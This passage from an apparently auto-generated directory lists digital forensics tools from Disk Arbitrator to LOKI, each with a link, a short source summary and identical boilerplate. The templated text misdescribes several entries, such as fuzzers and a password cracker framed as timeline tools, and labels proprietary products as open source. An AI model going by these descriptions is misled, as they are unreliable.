• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Digital Forensics Tool Testing Images is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > File System Corpora.

Back to Name Jump

Disk Arbitrator

• Website: https://github.com/aburgh/Disk-Arbitrator
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Disk Arbitrator is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A Mac OS X forensic utility designed to help the user ensure correct forensic procedures are followed during imaging of a disk device.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Disk image handling.

Back to Name Jump

Docker Explorer

• Website: https://github.com/google/docker-explorer
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Docker Explorer is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Extracts and interprets forensic artifacts from disk images of Docker Host systems.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Docker Forensics.

Back to Name Jump

dof (Docker Forensics Toolkit)

• Website: https://github.com/docker-forensics-toolkit/toolkit
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: dof (Docker Forensics Toolkit) is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Extracts and interprets forensic artifacts from disk images of Docker Host systems.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Docker Forensics.

Back to Name Jump

Letter E

This letter section contains 1 tools.

Extundelete

• Website: http://extundelete.sourceforge.net/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: Extundelete is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Used for recovering lost data from mountable images.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

Letter F

This letter section contains 13 tools.

FireEye Memoryze

• Website: https://fireeye.market/apps/211368
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: FireEye Memoryze is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A free memory forensic software.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

Back to Name Jump

FIT

• Website: https://github.com/fit-project/fit
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: FIT is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Forensic acquisition of web pages, emails, social media, etc.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

Back to Name Jump

Forensic challenges

• Website: https://www.amanhardikar.com/mindmaps/ForensicChallenges.html
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Forensic challenges is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Mindmap of forensic challenges.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics.

Back to Name Jump

ForensicPosters

• Website: https://github.com/Invoke-IR/ForensicPosters
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: ForensicPosters is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Posters of file system structures.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Other.

Back to Name Jump

Forensics

• Website: https://github.com/Cugu/awesome-forensics
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Malware Analysis, Awesome Penetration Testing

What it does: Forensics is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Penetration Testing > Online Resources > Other Lists Online.

Back to Name Jump

Forensics CTFs

• Website: https://github.com/apsdehal/awesome-ctf/blob/master/README.md#forensics
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Forensics CTFs is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

Forensics StartMe by Stark 4N6

• Website: https://startme.stark4n6.com
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Forensics StartMe by Stark 4N6 is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Web.

Back to Name Jump

Forensics tools on Wikipedia

• Website: https://en.wikipedia.org/wiki/List_of_digital_forensics_tools
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Forensics tools on Wikipedia is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools.

Back to Name Jump

ForensicsFocus

• Website: https://www.forensicfocus.com/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: ForensicsFocus is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Web.

Back to Name Jump

FRED

• Website: https://www.pinguin.lu/fred
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: FRED is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Cross-platform microsoft registry hive editor.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts.

Back to Name Jump

Fsck.ext4

• Website: http://linux.die.net/man/8/fsck.ext3
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: Fsck.ext4 is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Used to fix corrupt filesystems.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

FTK Imager

• Website: https://www.exterro.com/digital-forensics-software/ftk-imager
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: FTK Imager is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Free imageing tool for windows.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Imaging.

Back to Name Jump

Fuji

• Website: https://github.com/Lazza/Fuji/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Fuji is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: MacOS forensic acquisition made simple. It creates full file system copies or targeted collection of Mac computers.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

Back to Name Jump

Letter G

This letter section contains 3 tools.

Ghiro

• Website: https://github.com/Ghirensics/ghiro
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Ghiro is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A fully automated tool designed to run forensics analysis over a massive amount of images.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Picture Analysis.

Back to Name Jump

Grafeas

• Website: https://grafeas.io/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Cybersecurity Blue Team

What it does: Grafeas is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Open artifact metadata API to audit and govern your software supply chain.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Cybersecurity Blue Team > DevSecOps > Supply chain security.

Back to Name Jump

Guymager

• Website: https://sourceforge.net/projects/guymager/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Guymager is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Open source version for disk imageing on linux systems.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Imaging.

Back to Name Jump

Letter H

This letter section contains 3 tools.

hashlookup-forensic-analyser

• Website: https://github.com/hashlookup/hashlookup-forensic-analyser
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: hashlookup-forensic-analyser is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A tool to analyse files from a forensic acquisition to find known/unknown hashes from API or using a local Bloom filter.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Frameworks.

Back to Name Jump

Hashment

• Website: https://github.com/hashment/yaffs2-forensic-tool
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Hashment is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Python forensic tool to analyze, dump, and recover deleted files from YAFFS2 partitions.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Acquisition.

Back to Name Jump

hollows_hunter

• Website: https://github.com/hasherezade/hollows_hunter
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Threat Detection

What it does: hollows_hunter is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Scans all running processes, recognizes and dumps a variety of potentially malicious implants (replaced/implanted PEs, shellcodes, hooks, in-memory patches).

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump

Letter I

This letter section contains 8 tools.

IE10Analyzer

• Website: https://github.com/moaistory/IE10Analyzer
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: IE10Analyzer is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: This tool can parse normal records and recover deleted records in WebCacheV01.dat.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Internet Artifacts.

Back to Name Jump

iLEAPP

• Website: https://github.com/abrignoni/iLEAPP
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: iLEAPP is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: An iOS Logs, Events, And Plists Parser.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Mobile Forensics.

Back to Name Jump

Incidents

• Website: https://github.com/veeral-patel/incidents
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Incidents is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Web application for organizing non-trivial security investigations. Built on the idea that incidents are trees of tickets, where some tickets are leads.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Management.

Back to Name Jump

InfoStealers

• Website: https://infostealers.info/en/info
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome OSINT

What it does: InfoStealers is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Indexes darknet-exposed infostealer logs and makes them searchable and actionable for security teams, investigators, researchers, and digital forensics professionals.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome OSINT > ↑ Email Search / Email Check.

Back to Name Jump

IntelBase

• Website: https://intelbase.is/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome OSINT

What it does: IntelBase is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Forensics platform focused on reverse email lookup and email data enrichment.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome OSINT > ↑ Email Search / Email Check.

Back to Name Jump

iOS Frequent Locations Dumper

• Website: https://github.com/mac4n6/iOS-Frequent-Locations-Dumper
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: iOS Frequent Locations Dumper is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Dump the contents of the StateModel#.archive files located in /private/var/mobile/Library/Caches/com.apple.routined/.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Mobile Forensics.

Back to Name Jump

IPED - Indexador e Processador de Evidências Digitais

• Website: https://github.com/sepinf-inc/IPED
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: IPED - Indexador e Processador de Evidências Digitais is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Brazilian Federal Police Tool for Forensic Investigations.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Frameworks.

Back to Name Jump

IvySyn

• Website: https://gitlab.com/brown-ssl/ivysyn
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Fuzzing

What it does: IvySyn is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: IvySyn is a fully-automated framework for discovering memory error vulnerabilities in Deep Learning (DL) frameworks.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Fuzzing > Tools > API.

Back to Name Jump

Letter J

This letter section contains 1 tools.

John the Ripper

• Website: https://www.openwall.com/john/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: John the Ripper is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Password cracker.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Decryption.

Back to Name Jump

Letter K

This letter section contains 3 tools.

KeeFarce

• Website: https://github.com/denandz/KeeFarce
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: KeeFarce is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Extract KeePass passwords from memory.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Memory Forensics.

Back to Name Jump

Kroll Artifact Parser and Extractor (KAPE)

• Website: https://learn.duffandphelps.com/kape
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: Kroll Artifact Parser and Extractor (KAPE) is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Triage program.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Create > Forensics.

Back to Name Jump

kube-forensics

• Website: https://github.com/keikoproj/kube-forensics
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Cybersecurity Blue Team

What it does: kube-forensics is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Allows a cluster administrator to dump the current state of a running pod and all its containers so that security professionals can perform off-line forensic analysis.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Cybersecurity Blue Team > Cloud platform security > Kubernetes.

Back to Name Jump

Letter L

This letter section contains 3 tools.

libewf

• Website: https://github.com/libyal/libewf
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: libewf is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Libewf is a library and some tools to access the Expert Witness Compression Format (EWF, E01).

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Disk image handling.

Back to Name Jump

Linux Expl0rer

• Website: https://github.com/intezer/linux-explorer
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Linux Expl0rer is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Easy-to-use live forensics toolbox for Linux endpoints written in Python & Flask.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Live Forensics.

Back to Name Jump

LOKI

• Website: https://github.com/ConsensusFuzz/LOKI
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Fuzzing

What it does: LOKI is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: LOKI is a blockchain consensus protocol fuzzing framework that detects the consensus memory related and logic bugs.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Fuzzing > Tools > Blockchain.

Back to Name Jump

Letter M

This letter section contains 13 tools.

MacLocationsScraper

• Website: https://github.com/mac4n6/Mac-Locations-Scraper
• Model: Open Source
• Category: Digital Forensics & DFIR
